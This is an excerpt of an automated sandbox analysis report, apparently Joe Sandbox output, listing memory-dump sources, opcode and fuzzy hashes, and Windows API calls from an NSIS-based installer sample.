                                                                                                                                                                                                                          • API String ID: 0-2683408296
                                                                                                                                                                                                                          • Opcode ID: 18267e98d51f2ea1e476f1b0634f0a5e6cac815e83111d9226d25eefc3b47353
                                                                                                                                                                                                                          • Instruction ID: 19e8f370e15dba1449734a74d4e8a5a8fcf54977aee958ec6fc35d96256c901a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18267e98d51f2ea1e476f1b0634f0a5e6cac815e83111d9226d25eefc3b47353
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 90d2103e38711d56a45469a0e443f8a7e432e2640b8d3b5b40008916d7b44d1d
                                                                                                                                                                                                                          • Instruction ID: ce177ff23cbf18d49f7b83c03cbb3f2f360d3daa677798a0f70f358480b4aac6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90d2103e38711d56a45469a0e443f8a7e432e2640b8d3b5b40008916d7b44d1d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5671B174E002088FDB09DFA9C991ADDBBB2EF88300F64812AD405BB365DB399946CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 462f9be57c39fa44ea0d943a613986927d4949e6a5b005c5de88a030f40d797c
                                                                                                                                                                                                                          • Instruction ID: 548c76b2bfd879f7b0aa3aff0f7b2ed5718c90150ca445d3c6c36f4850e6ccca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 462f9be57c39fa44ea0d943a613986927d4949e6a5b005c5de88a030f40d797c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E71B174E002188FDB19DFA9C991ADDBBB2FF88300F648529D444BB365DB399946CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ae285fa3b2a3264bc2360ae25f13ace5c1d33515658783df718d77b94d320373
                                                                                                                                                                                                                          • Instruction ID: 695382f02946940981dbe2b34cfbcd8ecd8859df429a1bd025cf16155804f3b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ae285fa3b2a3264bc2360ae25f13ace5c1d33515658783df718d77b94d320373
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6519274E012089FDB48CFA9D9949DDBBF2BF89300F248169E819AB365DB31A941CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 26dcf33a68e4652f84ae55c6f7d37cfaa93df043dd91d0b93fe00ebd602b3659
                                                                                                                                                                                                                          • Instruction ID: d5b66d473cb920118be89b14fad9750c19690436381c22e76329f37f10781951
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26dcf33a68e4652f84ae55c6f7d37cfaa93df043dd91d0b93fe00ebd602b3659
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF518F75E01208CFCB48DFA9D5949DDBBF2FF89310B209469E809AB364DB35A852CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: a0bd907e246b4cfecd100bc288268a8557aff3500bee3210f13ba41232973e76
                                                                                                                                                                                                                          • Instruction ID: 356f0bc9f679220514972fddcb658a3112d6adb3dba3b6b2e37cb110d213168e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0bd907e246b4cfecd100bc288268a8557aff3500bee3210f13ba41232973e76
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D651AD31A05259DFCF09CFA4C884BDDBFB2BF49310F448066E811AB265D371A994DBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 295ce35018299fb4a30876f397dc9314697330c84d5758212df0ef3ef8f4805e
                                                                                                                                                                                                                          • Instruction ID: 52def5cbd3971a9d1d314c680345154d7035adf5edde81a9cec85a01c628ee4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 295ce35018299fb4a30876f397dc9314697330c84d5758212df0ef3ef8f4805e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A316E3570450ADFDF099FA4D855AEE3BA2FB89310F404039F9069B2A5CB39DD61DBA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5972950864.0000000038CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38CA0000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_38ca0000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4fb77157b353aa71306c8388b4212acad04cd20f0b57ddfe277792c32f124ca8
                                                                                                                                                                                                                          • Instruction ID: 01cd8f89d41c9d735f4b9399a009bb2b2050c603376e52e89399c8b9ddb5d592
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4fb77157b353aa71306c8388b4212acad04cd20f0b57ddfe277792c32f124ca8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CC31F774E012488BDB08DFEAC5416DEBBF2AF89300F24D42AC819BB255DB385946CF50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ebb22761907d1ee56faa32430980972cc0b3f363da71645a1374707e4ea8c5bb
                                                                                                                                                                                                                          • Instruction ID: e4c246fb876ef8a4af377876a36f125b1c9133f8ff0148d0ad5301e17245aae4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ebb22761907d1ee56faa32430980972cc0b3f363da71645a1374707e4ea8c5bb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6121B231A0011C9FCB18DF68C4509EE7BB5EB99368F58C029D8199B350DB34EE96CBD2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5942969933.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_9d000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 769db10822cfcd4181ff90efe9753085edd112f87ad3de122886a1ca677d6f37
                                                                                                                                                                                                                          • Instruction ID: f9440aadd935025df3e27146d1f8a9dce769340c52eed68e7c269c271d871e97
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 769db10822cfcd4181ff90efe9753085edd112f87ad3de122886a1ca677d6f37
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE212575684340EFDF15DF14D9C0B2ABFA1FB88314F24C56AE8090B246C336D856EBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943080241.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_ad000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 680521960728937b8232a4c30121d84a0da7b106d66f7d65944c8ea84b47bb4d
                                                                                                                                                                                                                          • Instruction ID: bdf9752d804c284673a6162f2f68df9873faa00502a181b24bf129b4c91077d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 680521960728937b8232a4c30121d84a0da7b106d66f7d65944c8ea84b47bb4d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42212575604300AFDB20CF64D9C4F26BBA1FB85314F20C96EE84A4B646C73AD846CA62
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5098f585e3c4ec1b7dab8898f3134a574d5a07a6dc4e0c39f59a70ea4885a6dd
                                                                                                                                                                                                                          • Instruction ID: 648b7fb3afb1818aa6db1723ff62d3547e5bd5753a95d417b317cea4d102c011
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5098f585e3c4ec1b7dab8898f3134a574d5a07a6dc4e0c39f59a70ea4885a6dd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45318079E51208DFCB48DFA8D59489DBBF2FF49305B208069E809AB324DB35AD51CF00
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ef36221b7ee37acdf84b300aa32e62f36afd868c1c2d7df21d67b4b9fd357479
                                                                                                                                                                                                                          • Instruction ID: 890baf2b62be14167888bc9a634e9ed11481cb3d0575004e4d3b3169bd4887f0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef36221b7ee37acdf84b300aa32e62f36afd868c1c2d7df21d67b4b9fd357479
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9621A232604509DFDB09AFA4D445AEE3BA6EBC6314F414079F805DB2A5CB38DD92DBE0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4cb61ffe2e0d5e85709df77529f9169db6aa4b57e4dabddb4a0d962d9b47255c
                                                                                                                                                                                                                          • Instruction ID: 4ab66e442f0f54293193f83128456149747f11fd044fac5e2b21b76658830fc4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4cb61ffe2e0d5e85709df77529f9169db6aa4b57e4dabddb4a0d962d9b47255c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E112B313086124BEB1D5629D8647FEA6E69FD0759F298039E412CB7E4EF29CCC29781
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c8f21a084fdcb001528f13f30c6d3ce2f573ce532c9982af3844038b2af56d73
                                                                                                                                                                                                                          • Instruction ID: 09f2753805519d662671a1176faf28c46398d3483a35a349398f635f8201f700
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8f21a084fdcb001528f13f30c6d3ce2f573ce532c9982af3844038b2af56d73
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D217C35E112489FDB0CDFF1D560AEDBBF6AF89305F248069E411B62A0DB359A42DF10
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9d7e20c119770bebbe9039cfde5a9795009d170ed98a766feb2e12761ff29572
                                                                                                                                                                                                                          • Instruction ID: 31070afa1bfa9e1385202d6397d4d0552898397e24c9265697652f4b83b3ad0e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9d7e20c119770bebbe9039cfde5a9795009d170ed98a766feb2e12761ff29572
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21B431A01205DFDF18CF68C888BDEBFB2AF84314F588565D455AB691D3B1E890CB56
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5942969933.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_9d000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 46170cc853492c51b5d3aee37104db3d90f42447897c3985e43b5152abe6c2d8
                                                                                                                                                                                                                          • Instruction ID: a489d22c3e95c91b7d97d68ff57e8fb520ee303e9aaf7575225a0bc89a6b16f6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46170cc853492c51b5d3aee37104db3d90f42447897c3985e43b5152abe6c2d8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F110376544280CFCF11CF14D5C4B16BFB1FB84314F24C5AAD8090B616C336D85ADBA2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 2ae3f2a68d26548211adf93024867e36500cd826f317b5e2d9faf00e5d295e46
                                                                                                                                                                                                                          • Instruction ID: 96e8a3d8ba4c80e23ac5cfa8323c799c42eb112d70b92374140cbfb7800ed6ed
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ae3f2a68d26548211adf93024867e36500cd826f317b5e2d9faf00e5d295e46
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F21D674D0060A8FDB04EFB9D8446EEBFF1BF4A310F14526AD805B3264EB341A95CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943080241.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_ad000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: b8211d19549ce13da869c0f08bf0458015dedba19c7731aec5b5b1c5e98523d9
                                                                                                                                                                                                                          • Instruction ID: 1ddd4123093141b058bc9a8bf00f6ebd0bebc1b760f1ba28106daf6c12c6d7d1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b8211d19549ce13da869c0f08bf0458015dedba19c7731aec5b5b1c5e98523d9
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB11D075504280DFCB11CF54C5C4B15BBA1FB45314F24CAAED84A4B656C33AD84ACF52
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 0531d551e6092875c527ae248c22b0eee0b44797c057d40137a908be646f77ff
                                                                                                                                                                                                                          • Instruction ID: f409180432f5b205a2e8ef5d833eb5a8a2a73d3f67915ec119fbe656777c5b65
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0531d551e6092875c527ae248c22b0eee0b44797c057d40137a908be646f77ff
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB112774D00209AFCB01CFA4C8456AEBBB1EB4E300F1145A5D910A7361D7396A56CB91
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000B.00000002.5943756624.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_110000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetErrorMode.KERNEL32 ref: 004030FE
                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 00403104
                                                                                                                                                                                                                          • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403153
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 0040315A
                                                                                                                                                                                                                          • SHGetFileInfoA.SHELL32(0041ECE0,00000000,?,00000160,00000000), ref: 00403176
                                                                                                                                                                                                                          • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040318B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00429000,00000000), ref: 0040319E
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,00429000,00000020), ref: 004031C9
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(00000400,0042A400,00000000,00000020), ref: 004032C6
                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(0042A400,000003FB), ref: 004032D7
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A400,\Temp), ref: 004032E3
                                                                                                                                                                                                                          • GetTempPathA.KERNEL32(000003FC,0042A400,0042A400,\Temp), ref: 004032F7
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(0042A400,Low), ref: 004032FF
                                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TEMP,0042A400,0042A400,Low), ref: 00403310
                                                                                                                                                                                                                          • SetEnvironmentVariableA.KERNEL32(TMP,0042A400), ref: 00403318
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(0042A000), ref: 0040332C
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                                                                                                                                                                                            • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 004033DA
                                                                                                                                                                                                                            • Part of subcall function 004054F3: MessageBoxIndirectA.USER32(00409230), ref: 0040554E
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004033FB
Memory Dump Source
• Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: EnvironmentFileHandleModulePathTempVariablelstrcat$AddressCharCommandDeleteDirectoryErrorExitIndirectInfoInitializeLineMessageModeNextProcProcessUninitializeVersionWindows
                                                                                                                                                                                                                          • String ID: "$.tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu$A
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 004048AB
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 004048B6
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404900
                                                                                                                                                                                                                          • LoadBitmapA.USER32(0000006E), ref: 00404913
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,00404E8A), ref: 0040492C
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404940
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404952
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001109,00000002), ref: 00404968
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404974
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404986
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404989
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049C0
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A55
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A80
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A94
                                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404AC3
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404AD1
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404AE2
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDF
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C44
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C59
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C7D
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C9D
                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404CB2
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404CC2
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D3B
                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001102,?,?), ref: 00404DE4
                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DF3
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,?), ref: 00404E13
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00404E61
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00404E6C
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 00404E73
Memory Dump Source
• Source File: 0000000B.00000002.5944530137.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.5944462931.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944599537.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944650329.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.5944704499.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                          • String ID: $M$N
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,?,766B3410,0042A400,00000000), ref: 004055C8
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(00420D28,\*.*,00420D28,?,?,766B3410,0042A400,00000000), ref: 00405610
                                                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00409014,?,00420D28,?,?,766B3410,0042A400,00000000), ref: 00405631
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D28,?,?,766B3410,0042A400,00000000), ref: 00405637
